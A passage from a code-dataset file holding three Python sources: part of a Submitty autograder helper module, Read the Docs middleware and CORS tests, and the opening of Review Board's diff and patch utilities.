dateutils.read_submitty_date(grading_began_longstring)\n\n gradingtime = (grading_finished - grading_began).total_seconds()\n\n queue_obj[\"gradingtime\"]=gradingtime\n queue_obj[\"grade_result\"]=grade_result\n queue_obj[\"which_untrusted\"]=which_untrusted\n waittime = queue_obj[\"waittime\"]\n\n try:\n\n # Make certain results.json is utf-8 encoded.\n results_json_path = os.path.join(tmp_work, 'results.json')\n with codecs.open(results_json_path, 'r', encoding='utf-8', errors='ignore') as infile:\n results_str = \"\".join(line.rstrip() for line in infile)\n results_obj = json.loads(results_str)\n with open(results_json_path, 'w') as outfile:\n json.dump(results_obj, outfile, indent=4)\n\n shutil.move(results_json_path, os.path.join(tmp_results, \"results.json\"))\n except:\n with open(os.path.join(tmp_logs,\"overall.txt\"),'a') as f:\n f.write(f\"\\n\\nERROR: Grading incomplete -- Could not open/write {os.path.join(tmp_work,'results.json')}\")\n config.logger.log_message(\n \"ERROR: results.json read/write error\",\n job_id=job_id,\n is_batch=is_batch_job,\n which_untrusted=which_untrusted,\n jobname=item_name,\n )\n config.logger.log_stack_trace(\n traceback.format_exc(),\n job_id=job_id,\n is_batch=is_batch_job,\n which_untrusted=which_untrusted,\n jobname=item_name,\n )\n\n # Rescue custom validator files\n custom_validator_output_directory = os.path.join(tmp_results, \"custom_validator_output\")\n pattern_copy(\"rescue_custom_validator_validation_jsons\", [os.path.join(tmp_work, 'validation_results_*.json'),], tmp_work, custom_validator_output_directory, tmp_logs)\n pattern_copy(\"rescue_custom_validator_logs\", [os.path.join(tmp_work, 'validation_logfile_*.txt'),], tmp_work, custom_validator_output_directory, tmp_logs)\n pattern_copy(\"rescue_custom_validator_errors\", [os.path.join(tmp_work, 'validation_stderr_*.txt'),], tmp_work, custom_validator_output_directory, tmp_logs)\n\n just_write_grade_history(history_file,\n gradeable_deadline_longstring,\n submission_longstring,\n seconds_late,\n first_access_string,\n access_duration,\n queue_obj[\"queue_time\"],\n \"BATCH\" if is_batch_job else \"INTERACTIVE\",\n grading_began_longstring,\n int(waittime),\n grading_finished_longstring,\n 
int(gradingtime),\n grade_result,\n queue_obj.get(\"revision\", None))\n\n with open(os.path.join(tmp_logs,\"overall.txt\"),'a') as f:\n f.write(\"FINISHED GRADING!\\n\")\n\n config.logger.log_message(\n grade_result,\n job_id=job_id,\n is_batch=is_batch_job,\n which_untrusted=which_untrusted,\n jobname=item_name,\n timelabel=\"grade:\",\n elapsed_time=gradingtime\n )\n\n with open(os.path.join(tmp_results,\"queue_file.json\"),'w') as outfile:\n json.dump(queue_obj,outfile,sort_keys=True,indent=4,separators=(',', ': '))\n\n # save the logs!\n shutil.copytree(tmp_logs,os.path.join(tmp_results,\"logs\"))\n\n # Save the .submit.notebook\n # Copy the .submit.notebook to tmp_work for validation\n submit_notebook_path = os.path.join(tmp_submission, 'submission', \".submit.notebook\")\n if os.path.exists(submit_notebook_path):\n shutil.copy(\n submit_notebook_path,\n os.path.join(tmp_results, \".submit.notebook\")\n )\n\n\ndef allow_only_one_part(path, log_path=os.devnull):\n \"\"\"\n Given a path to a directory, iterate through the directory and detect folders that start with\n \"part\". If there is more than one and they have files, then delete all of the part folders except\n for the first one that has files.\n\n An example would be if you had the folder structure:\n part1/\n test.py\n part2/\n test.cpp\n\n Then the part2 folder would be deleted, leaving just the part1 folder.\n\n :param path: string filepath to directory to scan for parts in\n :param log_path: string filepath to file to write print statements to\n \"\"\"\n if not os.path.isdir(path):\n return\n with open(log_path, 'a') as log:\n clean_directories = []\n print('Clean up multiple parts')\n log.flush()\n for entry in sorted(os.listdir(path)):\n full_path = os.path.join(path, entry)\n if not os.path.isdir(full_path) or not entry.startswith('part'):\n continue\n count = len(os.listdir(full_path))\n print('{}: {}'.format(entry, count))\n if count > 0:\n clean_directories.append(full_path)\n\n if len(clean_directories) > 1:\n print(\"Student submitted to multiple parts in violation of instructions.\\n\"\n \"Removing files from all but first non empty part.\")\n\n for i in range(1, len(clean_directories)):\n print(\"REMOVE: {}\".format(clean_directories[i]))\n for entry in os.listdir(clean_directories[i]):\n print(\" -> {}\".format(entry))\n shutil.rmtree(clean_directories[i])\n\n# go through the testcase folder (e.g. 
test01/) and remove anything\n# that matches the test input (avoid archiving copies of these files!)\ndef remove_test_input_files(overall_log, test_input_path, testcase_folder):\n for path, subdirs, files in os.walk(test_input_path):\n for name in files:\n relative = path[len(test_input_path)+1:]\n my_file = os.path.join(testcase_folder, relative, name)\n if os.path.isfile(my_file):\n print (\"removing (likely) stale test_input file: \", my_file, file=overall_log)\n overall_log.flush()\n os.remove(my_file)\n\n\ndef add_permissions(item,perms):\n if os.getuid() == os.stat(item).st_uid:\n os.chmod(item,os.stat(item).st_mode | perms)\n # else, can't change permissions on this file/directory!\n\n\ndef add_permissions_recursive(top_dir,root_perms,dir_perms,file_perms):\n for root, dirs, files in os.walk(top_dir):\n add_permissions(root,root_perms)\n for d in dirs:\n add_permissions(os.path.join(root, d),dir_perms)\n for f in files:\n add_permissions(os.path.join(root, f),file_perms)\n\n\n# copy the files & directories from source to target\n# it will create directories as needed\n# it's ok if the target directory or subdirectories already exist\n# it will overwrite files with the same name if they exist\ndef copy_contents_into(config, job_id, source, target, tmp_logs):\n if not os.path.isdir(target):\n config.logger.log_message(\n \"ERROR: Could not copy contents. The target directory does not exist: \" + target,\n job_id=job_id\n )\n raise RuntimeError(\"ERROR: the target directory does not exist: '\", target, \"'\")\n if os.path.isdir(source):\n for item in os.listdir(source):\n if os.path.isdir(os.path.join(source,item)):\n if os.path.isdir(os.path.join(target,item)):\n # recurse\n copy_contents_into(config, job_id,os.path.join(source,item),os.path.join(target,item),tmp_logs)\n elif os.path.isfile(os.path.join(target,item)):\n config.logger.log_message(\n \"ERROR: the target subpath is a file not a directory \"\n f\"'{os.path.join(target,item)}'\",\n job_id=job_id,\n )\n raise RuntimeError(\"ERROR: the target subpath is a file not a directory '\", os.path.join(target,item), \"'\")\n else:\n # copy entire subtree\n shutil.copytree(os.path.join(source,item),os.path.join(target,item))\n else:\n if os.path.exists(os.path.join(target,item)):\n with open(os.path.join(tmp_logs,\"overall.txt\"),'a') as f:\n print (\"\\nWARNING: REMOVING DESTINATION FILE\" , os.path.join(target,item),\n \" THEN OVERWRITING: \", os.path.join(source,item), \"\\n\", file=f)\n os.remove(os.path.join(target,item))\n try:\n shutil.copy(os.path.join(source,item),target)\n except:\n config.logger.log_stack_trace(traceback.format_exc(), job_id=job_id)\n return\n else:\n print(f'{source} is not a directory')\n\n\n# copy files that match one of the patterns from the source directory\n# to the target directory.\ndef pattern_copy(what, patterns, source, target, tmp_logs):\n with open(os.path.join(tmp_logs,\"overall.txt\"),'a') as f:\n print (what,\" pattern copy \", patterns, \" from \", source, \" -> \", target, file=f)\n for pattern in patterns:\n for my_file in glob.glob(os.path.join(source,pattern),recursive=True):\n if (os.path.isfile(my_file)):\n # grab the matched name\n relpath = os.path.relpath(my_file,source)\n # make the necessary directories leading to the file\n os.makedirs(os.path.join(target,os.path.dirname(relpath)),exist_ok=True)\n # copy the file\n shutil.copy(my_file,os.path.join(target,relpath))\n print (\" COPY \",my_file,\n \" -> \",os.path.join(target,relpath), file=f)\n else:\n print (\"skip this directory 
(will recurse into it later)\", my_file, file=f)\n\n\n# give permissions to all created files to the DAEMON_USER\ndef untrusted_grant_rwx_access(SUBMITTY_INSTALL_DIR, which_untrusted, my_dir):\n subprocess.call([os.path.join(SUBMITTY_INSTALL_DIR, \"sbin\", \"untrusted_execute\"),\n which_untrusted,\n \"/usr/bin/find\",\n my_dir,\n \"-user\",\n which_untrusted,\n \"-exec\",\n \"/bin/chmod\",\n \"ugo+rwx\",\n \"{}\",\n \";\"])\n\n# Used by packer unpacker\ndef zip_my_directory(path,zipfilename):\n zipf = zipfile.ZipFile(zipfilename,'w',zipfile.ZIP_DEFLATED)\n for root,dirs,files in os.walk(path):\n for my_file in files:\n relpath = root[len(path)+1:]\n zipf.write(os.path.join(root,my_file),os.path.join(relpath,my_file))\n zipf.close()\n\n# Used by packer unpacker\ndef unzip_this_file(zipfilename,path):\n if not os.path.exists(zipfilename):\n raise RuntimeError(\"ERROR: zip file does not exist '\", zipfilename, \"'\")\n zip_ref = zipfile.ZipFile(zipfilename,'r')\n zip_ref.extractall(path)\n zip_ref.close()\n\n# ==================================================================================\n#\n# PRE- AND POST-COMMAND FUNCTIONS\n#\n# ==================================================================================\n\n\ndef pre_command_copy_file(config, source_testcase, source_directory, destination_testcase, destination, job_id, tmp_logs):\n \"\"\" Handles the cp pre_command. \"\"\"\n\n source_testcase = os.path.join(str(os.getcwd()), source_testcase)\n\n if not os.path.isdir(source_testcase):\n raise RuntimeError(\"ERROR: The directory {0} does not exist.\".format(source_testcase))\n\n if not os.path.isdir(destination_testcase):\n raise RuntimeError(\"ERROR: The directory {0} does not exist.\".format(destination_testcase))\n\n source = os.path.join(source_testcase, source_directory)\n target = os.path.join(destination_testcase, destination)\n\n # The target without the potential executable.\n target_base = '/'.join(target.split('/')[:-1])\n\n # If the source is a directory, we copy the entire thing into the\n # target.\n if os.path.isdir(source):\n # We must copy from directory to directory\n copy_contents_into(config, job_id, source, target, tmp_logs)\n\n # Separate ** and * for simplicity.\n elif not '**' in source:\n # Grab all of the files that match the pattern\n files = glob.glob(source, recursive=True)\n\n # The target base must exist in order for a copy to occur\n if target_base != '' and not os.path.isdir(target_base):\n raise RuntimeError(\"ERROR: The directory {0} does not exist.\".format(target_base))\n # Copy every file. 
This works whether target exists (is a directory) or does not (is a target file)\n for file in files:\n try:\n shutil.copy(file, target)\n except Exception as e:\n traceback.print_exc()\n config.logger.log_message(\n f\"Pre Command could not perform copy: {file} -> {target}\",\n job_id=job_id\n )\n else:\n # Everything after the first **.\n source_base = source[:source.find('**')]\n # The full target must exist (we must be moving to a directory.)\n if not os.path.isdir(target):\n raise RuntimeError(\"ERROR: The directory {0} does not exist.\".format(target))\n\n # Grab all of the files that match the pattern.\n files = glob.glob(source, recursive=True)\n\n # For every file matched\n for file_source in files:\n file_target = os.path.join(target, file_source.replace(source_base,''))\n # Remove the file path.\n file_target_dir = '/'.join(file_target.split('/')[:-1])\n # If the target directory doesn't exist, create it.\n if not os.path.isdir(file_target_dir):\n os.makedirs(file_target_dir)\n # Copy.\n try:\n shutil.copy(file_source, file_target)\n except Exception as e:\n traceback.print_exc()\n config.logger.log_message(\n f\"Pre Command could not perform copy: {file_source} -> {file_target}\",\n job_id=job_id\n )\n"} {"ext": "py", "sha": "1a312e1a1308dd2843df3b2ba6b71ce916acac0e", "content": "from __future__ import absolute_import\nfrom django.http import Http404\nfrom django.core.cache import cache\nfrom django.test import TestCase\nfrom django.test.client import RequestFactory\nfrom django.test.utils import override_settings\n\nfrom django_dynamic_fixture import get, new\n\nfrom corsheaders.middleware import CorsMiddleware\nfrom mock import patch\n\nfrom readthedocs.core.middleware import SubdomainMiddleware\nfrom readthedocs.projects.models import Project, ProjectRelationship, Domain\n\nfrom readthedocs.rtd_tests.utils import create_user\n\n\n@override_settings(USE_SUBDOMAIN=True)\nclass MiddlewareTests(TestCase):\n\n def setUp(self):\n self.factory = RequestFactory()\n self.middleware = SubdomainMiddleware()\n self.url = '/'\n self.owner = create_user(username='owner', password='test')\n self.pip = get(Project, slug='pip', users=[self.owner], privacy_level='public')\n\n def test_failey_cname(self):\n request = self.factory.get(self.url, HTTP_HOST='my.host.com')\n with self.assertRaises(Http404):\n self.middleware.process_request(request)\n self.assertEqual(request.cname, True)\n\n @override_settings(PRODUCTION_DOMAIN='readthedocs.org')\n def test_proper_subdomain(self):\n request = self.factory.get(self.url, HTTP_HOST='pip.readthedocs.org')\n self.middleware.process_request(request)\n self.assertEqual(request.urlconf, 'readthedocs.core.urls.subdomain')\n self.assertEqual(request.subdomain, True)\n self.assertEqual(request.slug, 'pip')\n\n @override_settings(PRODUCTION_DOMAIN='prod.readthedocs.org')\n def test_subdomain_different_length(self):\n request = self.factory.get(self.url, HTTP_HOST='pip.prod.readthedocs.org')\n self.middleware.process_request(request)\n self.assertEqual(request.urlconf, 'readthedocs.core.urls.subdomain')\n self.assertEqual(request.subdomain, True)\n self.assertEqual(request.slug, 'pip')\n\n def test_domain_object(self):\n self.domain = get(Domain, domain='docs.foobar.com', project=self.pip)\n\n request = self.factory.get(self.url, HTTP_HOST='docs.foobar.com')\n self.middleware.process_request(request)\n self.assertEqual(request.urlconf, 'readthedocs.core.urls.subdomain')\n self.assertEqual(request.domain_object, True)\n self.assertEqual(request.slug, 'pip')\n\n 
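    # A Domain record exists, but not for the requested host, so the
    # middleware should raise Http404.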
def test_domain_object_missing(self):\n self.domain = get(Domain, domain='docs.foobar2.com', project=self.pip)\n request = self.factory.get(self.url, HTTP_HOST='docs.foobar.com')\n with self.assertRaises(Http404):\n self.middleware.process_request(request)\n\n def test_proper_cname(self):\n cache.get = lambda x: 'my_slug'\n request = self.factory.get(self.url, HTTP_HOST='my.valid.homename')\n self.middleware.process_request(request)\n self.assertEqual(request.urlconf, 'readthedocs.core.urls.subdomain')\n self.assertEqual(request.cname, True)\n self.assertEqual(request.slug, 'my_slug')\n\n def test_request_header(self):\n request = self.factory.get(self.url, HTTP_HOST='some.random.com', HTTP_X_RTD_SLUG='pip')\n self.middleware.process_request(request)\n self.assertEqual(request.urlconf, 'readthedocs.core.urls.subdomain')\n self.assertEqual(request.cname, True)\n self.assertEqual(request.rtdheader, True)\n self.assertEqual(request.slug, 'pip')\n\n @override_settings(PRODUCTION_DOMAIN='readthedocs.org')\n def test_proper_cname_uppercase(self):\n cache.get = lambda x: x.split('.')[0]\n request = self.factory.get(self.url, HTTP_HOST='PIP.RANDOM.COM')\n self.middleware.process_request(request)\n self.assertEqual(request.urlconf, 'readthedocs.core.urls.subdomain')\n self.assertEqual(request.cname, True)\n self.assertEqual(request.slug, 'pip')\n\n def test_request_header_uppercase(self):\n request = self.factory.get(self.url, HTTP_HOST='some.random.com', HTTP_X_RTD_SLUG='PIP')\n self.middleware.process_request(request)\n self.assertEqual(request.urlconf, 'readthedocs.core.urls.subdomain')\n self.assertEqual(request.cname, True)\n self.assertEqual(request.rtdheader, True)\n self.assertEqual(request.slug, 'pip')\n\n @override_settings(USE_SUBDOMAIN=True)\n # no need to do a real dns query so patch cname_to_slug\n @patch('readthedocs.core.middleware.cname_to_slug', new=lambda x: 'doesnt')\n def test_use_subdomain_on(self):\n request = self.factory.get(self.url, HTTP_HOST='doesnt.really.matter')\n ret_val = self.middleware.process_request(request)\n self.assertIsNone(ret_val, None)\n\n\nclass TestCORSMiddleware(TestCase):\n\n def setUp(self):\n self.factory = RequestFactory()\n self.middleware = CorsMiddleware()\n self.url = '/api/v2/search'\n self.owner = create_user(username='owner', password='test')\n self.project = get(\n Project, slug='pip',\n users=[self.owner], privacy_level='public',\n mail_language_project=None\n )\n self.subproject = get(\n Project,\n users=[self.owner],\n privacy_level='public',\n mail_language_project=None,\n )\n self.relationship = get(\n ProjectRelationship,\n parent=self.project,\n child=self.subproject\n )\n self.domain = get(Domain, domain='my.valid.domain', project=self.project)\n\n def test_proper_domain(self):\n request = self.factory.get(\n self.url,\n {'project': self.project.slug},\n HTTP_ORIGIN='http://my.valid.domain',\n )\n resp = self.middleware.process_response(request, {})\n self.assertIn('Access-Control-Allow-Origin', resp)\n\n def test_invalid_domain(self):\n request = self.factory.get(\n self.url,\n {'project': self.project.slug},\n HTTP_ORIGIN='http://invalid.domain',\n )\n resp = self.middleware.process_response(request, {})\n self.assertNotIn('Access-Control-Allow-Origin', resp)\n\n def test_invalid_project(self):\n request = self.factory.get(\n self.url,\n {'project': 'foo'},\n HTTP_ORIGIN='http://my.valid.domain',\n )\n resp = self.middleware.process_response(request, {})\n self.assertNotIn('Access-Control-Allow-Origin', resp)\n\n def 
test_valid_subproject(self):\n self.assertTrue(\n Project.objects.filter(\n pk=self.project.pk,\n subprojects__child=self.subproject\n ).exists()\n )\n request = self.factory.get(\n self.url,\n {'project': self.subproject.slug},\n HTTP_ORIGIN='http://my.valid.domain',\n )\n resp = self.middleware.process_response(request, {})\n self.assertIn('Access-Control-Allow-Origin', resp)\n"} {"ext": "py", "sha": "1a312ebad291791ff00ecf8ec50a32d5858a499f", "content": "from __future__ import unicode_literals\n\nimport fnmatch\nimport logging\nimport os\nimport re\nimport shutil\nimport subprocess\nimport tempfile\nfrom difflib import SequenceMatcher\nfrom functools import cmp_to_key\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.utils import six\nfrom django.utils.encoding import force_text\nfrom django.utils.translation import ugettext as _\nfrom djblets.log import log_timed\nfrom djblets.siteconfig.models import SiteConfiguration\nfrom djblets.util.compat.python.past import cmp\nfrom djblets.util.contextmanagers import controlled_subprocess\n\nfrom reviewboard.deprecation import RemovedInReviewBoard50Warning\nfrom reviewboard.diffviewer.commit_utils import exclude_ancestor_filediffs\nfrom reviewboard.diffviewer.errors import DiffTooBigError, PatchError\nfrom reviewboard.scmtools.core import PRE_CREATION, HEAD\n\n\nCHUNK_RANGE_RE = re.compile(\n br'^@@ -(?P<orig_start>\\d+)(,(?P<orig_len>\\d+))? '\n br'\\+(?P<modified_start>\\d+)(,(?P<modified_len>\\d+))? @@',\n re.M)\n\nNEWLINE_CONVERSION_BYTES_RE = re.compile(br'\\r(\\r?\\n)?')\nNEWLINE_CONVERSION_UNICODE_RE = re.compile(r'\\r(\\r?\\n)?')\nNEWLINE_BYTES_RE = re.compile(br'(?:\\n|\\r(?:\\r?\\n)?)')\nNEWLINE_UNICODE_RE = re.compile(r'(?:\\n|\\r(?:\\r?\\n)?)')\n\n_PATCH_GARBAGE_INPUT = 'patch: **** Only garbage was found in the patch input.'\n\n\ndef convert_to_unicode(s, encoding_list):\n \"\"\"Return the passed string as a unicode object.\n\n If conversion to unicode fails, we try the user-specified encoding, which\n defaults to ISO 8859-15. This can be overridden by users inside the\n repository configuration, which gives users repository-level control over\n file encodings.\n\n Ideally, we'd like to have per-file encodings, but this is hard. The best\n we can do now is a comma-separated list of things to try.\n\n Returns the encoding type which was used and the decoded unicode object.\n\n Args:\n s (bytes or bytearray or unicode):\n The string to convert to Unicode.\n\n encoding_list (list of unicode):\n The list of encodings to try.\n\n Returns:\n tuple:\n A tuple with the following information:\n\n 1. A compatible encoding (:py:class:`unicode`).\n 2. 
The Unicode data (:py:class:`unicode`).\n\n Raises:\n TypeError:\n The provided value was not a Unicode string, byte string, or\n a byte array.\n\n UnicodeDecodeError:\n None of the encoding types were valid for the provided string.\n \"\"\"\n if isinstance(s, bytearray):\n # Some SCMTool backends return file data as a bytearray instead of\n # bytes.\n s = bytes(s)\n\n if isinstance(s, six.text_type):\n # Nothing to do\n return 'utf-8', s\n elif isinstance(s, bytes):\n try:\n # First try strict utf-8\n enc = 'utf-8'\n return enc, six.text_type(s, enc)\n except UnicodeError:\n # Now try any candidate encodings\n for e in encoding_list:\n try:\n return e, six.text_type(s, e)\n except (UnicodeError, LookupError):\n pass\n\n # Finally, try to convert to unicode and replace all unknown\n # characters.\n try:\n enc = 'utf-8'\n return enc, six.text_type(s, enc, errors='replace')\n except UnicodeError:\n raise UnicodeDecodeError(\n _(\"Diff content couldn't be converted to unicode using \"\n \"the following encodings: %s\")\n % (['utf-8'] + encoding_list))\n else:\n raise TypeError('Value to convert is unexpected type %s', type(s))\n\n\ndef convert_line_endings(data):\n r\"\"\"Convert line endings in a file.\n\n Some types of repositories provide files with a single trailing Carriage\n Return (``\\r``), even if the rest of the file used a CRLF (``\\r\\n``)\n throughout. In these cases, GNU diff will add a ``\\ No newline at end of\n file`` to the end of the diff, which GNU patch understands and will apply\n to files with just a trailing ``\\r``.\n\n However, we normalize ``\\r`` to ``\\n``, which breaks GNU patch in these\n cases. This function works around this by removing the last ``\\r`` and\n then converting standard types of newlines to a ``\\n``.\n\n This is not meant for use in providing byte-compatible versions of files,\n but rather to help with comparing lines-for-lines in situations where\n two versions of a file may come from different platforms with different\n newlines.\n\n Args:\n data (bytes or unicode):\n A string to normalize. This supports either byte strings or\n Unicode strings.\n\n Returns:\n bytes or unicode:\n The data with newlines converted, in the original string type.\n\n Raises:\n TypeError:\n The ``data`` argument provided is not a byte string or Unicode\n string.\n \"\"\"\n # See https://www.reviewboard.org/bugs/386/ and\n # https://reviews.reviewboard.org/r/286/ for the rationale behind the\n # normalization.\n if data:\n if isinstance(data, bytes):\n cr = b'\\r'\n lf = b'\\n'\n newline_re = NEWLINE_CONVERSION_BYTES_RE\n elif isinstance(data, six.text_type):\n cr = '\\r'\n lf = '\\n'\n newline_re = NEWLINE_CONVERSION_UNICODE_RE\n else:\n raise TypeError(\n _('%s is not a valid string type for convert_line_endings.')\n % type(data))\n\n if data.endswith(cr):\n data = data[:-1]\n\n data = newline_re.sub(lf, data)\n\n return data\n\n\ndef split_line_endings(data):\n \"\"\"Split a string into lines while preserving all non-CRLF characters.\n\n Unlike :py:meth:`str.splitlines`, this will only split on the following\n character sequences: ``\\n``, ``\\r``, ``\\r\\n``, and ``\\r\\r\\n``.\n\n This is needed to prevent the sort of issues encountered with\n Unicode strings when calling :py:meth:`str.splitlines``, which is that form\n feed characters would be split. 
:program:`patch` and :program:`diff` accept\n form feed characters as valid characters in diffs, and doesn't treat them\n as newlines, but :py:meth:`str.splitlines` will treat it as a newline\n anyway.\n\n Args:\n data (bytes or unicode):\n The data to split into lines.\n\n Returns:\n list of bytes or unicode:\n The list of lines.\n \"\"\"\n if isinstance(data, bytes):\n lines = NEWLINE_BYTES_RE.split(data)\n elif isinstance(data, six.text_type):\n lines = NEWLINE_UNICODE_RE.split(data)\n else:\n raise TypeError('data must be a bytes or unicode string, not %s'\n % type(data))\n\n # splitlines() would chop off the last entry, if the string ends with\n # a newline. split() doesn't do this. We need to retain that same\n # behavior by chopping it off ourselves.\n if not lines[-1]:\n lines = lines[:-1]\n\n return lines\n\n\ndef patch(diff, orig_file, filename, request=None):\n \"\"\"Apply a diff to a file.\n\n This delegates out to ``patch`` because noone except Larry Wall knows how\n to patch.\n\n Args:\n diff (bytes):\n The contents of the diff to apply.\n\n orig_file (bytes):\n The contents of the original file.\n\n filename (unicode):\n The name of the file being patched.\n\n request (django.http.HttpRequest, optional):\n The HTTP request, for use in logging.\n\n Returns:\n bytes:\n The contents of the patched file.\n\n Raises:\n reviewboard.diffutils.errors.PatchError:\n An error occurred when trying to apply the patch.\n \"\"\"\n log_timer = log_timed('Patching file %s' % filename, request=request)\n\n if not diff.strip():\n # Someone uploaded an unchanged file. Return the one we're patching.\n return orig_file\n\n # Prepare the temporary directory if none is available\n tempdir = tempfile.mkdtemp(prefix='reviewboard.')\n\n try:\n orig_file = convert_line_endings(orig_file)\n diff = convert_line_endings(diff)\n\n (fd, oldfile) = tempfile.mkstemp(dir=tempdir)\n f = os.fdopen(fd, 'w+b')\n f.write(orig_file)\n f.close()\n\n newfile = '%s-new' % oldfile\n\n process = subprocess.Popen(['patch', '-o', newfile, oldfile],\n stdin=subprocess.PIPE, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, cwd=tempdir)\n\n with controlled_subprocess('patch', process) as p:\n stdout, stderr = p.communicate(diff)\n failure = p.returncode\n\n try:\n with open(newfile, 'rb') as f:\n new_file = f.read()\n except Exception:\n new_file = None\n\n if failure:\n rejects_file = '%s.rej' % newfile\n\n try:\n with open(rejects_file, 'rb') as f:\n rejects = f.read()\n except Exception:\n rejects = None\n\n error_output = force_text(stderr.strip() or stdout.strip())\n\n # Munge the output to show the filename instead of\n # randomly-generated tempdir locations.\n base_filename = os.path.basename(filename)\n\n error_output = (\n error_output\n .replace(rejects_file, '%s.rej' % base_filename)\n .replace(oldfile, base_filename)\n )\n\n raise PatchError(filename=filename,\n error_output=error_output,\n orig_file=orig_file,\n new_file=new_file,\n diff=diff,\n rejects=rejects)\n\n return new_file\n finally:\n shutil.rmtree(tempdir)\n log_timer.done()\n\n\ndef get_original_file_from_repo(filediff, request=None, encoding_list=None):\n \"\"\"Return the pre-patched file for the FileDiff from the repository.\n\n The parent diff will be applied if it exists.\n\n Version Added:\n 4.0\n\n Args:\n filediff (reviewboard.diffviewer.models.filediff.FileDiff):\n The FileDiff to retrieve the pre-patch file for.\n\n request (django.http.HttpRequest, optional):\n The HTTP request from the client.\n\n encoding_list (list of unicode, 
optional):\n A custom list of encodings to try when processing the file. This\n will override the encoding list normally retrieved from the\n FileDiff and repository.\n\n If there's already a known valid encoding for the file, it will be\n used instead.\n\n This is here for compatibility and will be removed in Review Board\n 5.0.\n\n Returns:\n bytes:\n The pre-patched file.\n\n Raises:\n UnicodeDecodeError:\n The source file was not compatible with any of the available\n encodings.\n\n reviewboard.diffutils.errors.PatchError:\n An error occurred when trying to apply the patch.\n\n reviewboard.scmtools.errors.SCMError:\n An error occurred while computing the pre-patch file.\n \"\"\"\n data = b''\n extra_data = filediff.extra_data or {}\n\n # If the file has a parent source filename/revision recorded, we're\n # going to need to fetch that, since that'll be (potentially) the\n # latest commit in the repository.\n #\n # This information was added in Review Board 3.0.19. Prior versions\n # stored the parent source revision as filediff.source_revision\n # (rather than leaving that as identifying information for the actual\n # file being shown in the review). It did not store the parent\n # filename at all (which impacted diffs that contained a moved/renamed\n # file on any type of repository that required a filename for lookup,\n # such as Mercurial -- Git was not affected, since it only needs\n # blob SHAs).\n #\n # If we're not working with a parent diff, or this is a FileDiff\n # with legacy parent diff information, we just use the FileDiff\n # FileDiff filename/revision fields as normal.\n source_filename = extra_data.get('parent_source_filename',\n filediff.source_file)\n source_revision = extra_data.get('parent_source_revision',\n filediff.source_revision)\n\n if source_revision != PRE_CREATION:\n repository = filediff.get_repository()\n\n data = repository.get_file(\n source_filename,\n source_revision,\n base_commit_id=filediff.diffset.base_commit_id,\n request=request)\n # Convert to unicode before we do anything to manipulate the string.\n encoding_list = get_filediff_encodings(filediff, encoding_list)\n encoding, data = convert_to_unicode(data, encoding_list)\n\n # Repository.get_file doesn't know or care about how we need line\n # endings to work. 
So, we'll just transform every time.\n #\n # This is mostly only a problem if the diff chunks aren't in the\n # cache, though if several people are working off the same file,\n # we'll be doing extra work to convert those line endings for each\n # of those instead of once.\n #\n # Only other option is to cache the resulting file, but then we're\n # duplicating the cached contents.\n data = convert_line_endings(data)\n\n # Convert back to bytes using whichever encoding we used to decode.\n data = data.encode(encoding)\n\n if not filediff.encoding:\n # Now that we know an encoding that works, remember it for next\n # time.\n filediff.extra_data['encoding'] = encoding\n filediff.save(update_fields=('extra_data',))\n\n # If there's a parent diff set, apply it to the buffer.\n if (filediff.parent_diff and\n not filediff.is_parent_diff_empty(cache_only=True)):\n try:\n data = patch(diff=filediff.parent_diff,\n orig_file=data,\n filename=source_filename,\n request=request)\n except PatchError as e:\n # patch(1) cannot process diff files that contain no diff sections.\n # We are going to check and see if the parent diff contains no diff\n # chunks.\n if (e.error_output == _PATCH_GARBAGE_INPUT and\n not filediff.is_parent_diff_empty()):\n raise\n\n return data\n\n\ndef get_original_file(filediff, request=None, encoding_list=None):\n \"\"\"Return the pre-patch file of a FileDiff.\n\n Version Changed:\n 4.0:\n The ``encoding_list`` parameter should no longer be provided by\n callers. Encoding lists are now calculated automatically. Passing\n a custom list will override the calculated one.\n\n Args:\n filediff (reviewboard.diffviewer.models.filediff.FileDiff):\n The FileDiff to retrieve the pre-patch file for.\n\n request (django.http.HttpRequest, optional):\n The HTTP request from the client.\n\n encoding_list (list of unicode, optional):\n A custom list of encodings to try when processing the file. This\n will override the encoding list normally retrieved from the\n FileDiff and repository.\n\n If there's already a known valid encoding for the file, it will be\n used instead.\n\n Returns:\n bytes:\n The pre-patch file.\n\n Raises:\n UnicodeDecodeError:\n The source file was not compatible with any of the available\n encodings.\n\n reviewboard.diffutils.errors.PatchError:\n An error occurred when trying to apply the patch.\n\n reviewboard.scmtools.errors.SCMError:\n An error occurred while computing the pre-patch file.\n \"\"\"\n if encoding_list:\n RemovedInReviewBoard50Warning.warn(\n 'The encoding_list parameter passed to get_original_file() is '\n 'deprecated and will be removed in Review Board 5.0.')\n\n data = b''\n\n # If the FileDiff has a parent diff, it must be the case that it has no\n # ancestor FileDiffs. 
We can fall back to the no history case here.\n if filediff.parent_diff:\n return get_original_file_from_repo(filediff=filediff,\n request=request,\n encoding_list=encoding_list)\n\n # Otherwise, there may be one or more ancestors that we have to apply.\n ancestors = filediff.get_ancestors(minimal=True)\n\n if ancestors:\n oldest_ancestor = ancestors[0]\n\n # If the file was created outside this history, fetch it from the\n # repository and apply the parent diff if it exists.\n if not oldest_ancestor.is_new:\n data = get_original_file_from_repo(filediff=oldest_ancestor,\n request=request,\n encoding_list=encoding_list)\n\n if not oldest_ancestor.is_diff_empty:\n data = patch(diff=oldest_ancestor.diff,\n orig_file=data,\n filename=oldest_ancestor.source_file,\n request=request)\n\n for ancestor in ancestors[1:]:\n # TODO: Cache these results so that if this ``filediff`` is an\n # ancestor of another FileDiff, computing that FileDiff's original\n # file will be cheaper. This will also allow an ancestor filediff's\n # original file to be computed cheaper.\n data = patch(diff=ancestor.diff,\n orig_file=data,\n filename=ancestor.source_file,\n request=request)\n elif not filediff.is_new:\n data = get_original_file_from_repo(filediff=filediff,\n request=request,\n encoding_list=encoding_list)\n\n return data\n\n\ndef get_patched_file(source_data, filediff, request=None):\n \"\"\"Return the patched version of a file.\n\n This will normalize the patch, applying any changes needed for the\n repository, and then patch the provided data with the patch contents.\n\n Args:\n source_data (bytes):\n The file contents to patch.\n\n filediff (reviewboard.diffviewer.models.filediff.FileDiff):\n The FileDiff representing the patch.\n\n request (django.http.HttpClient, optional):\n The HTTP request from the client.\n\n Returns:\n bytes:\n The patched file contents.\n \"\"\"\n repository = filediff.get_repository()\n diff = repository.normalize_patch(patch=filediff.diff,\n filename=filediff.source_file,\n revision=filediff.source_revision)\n\n 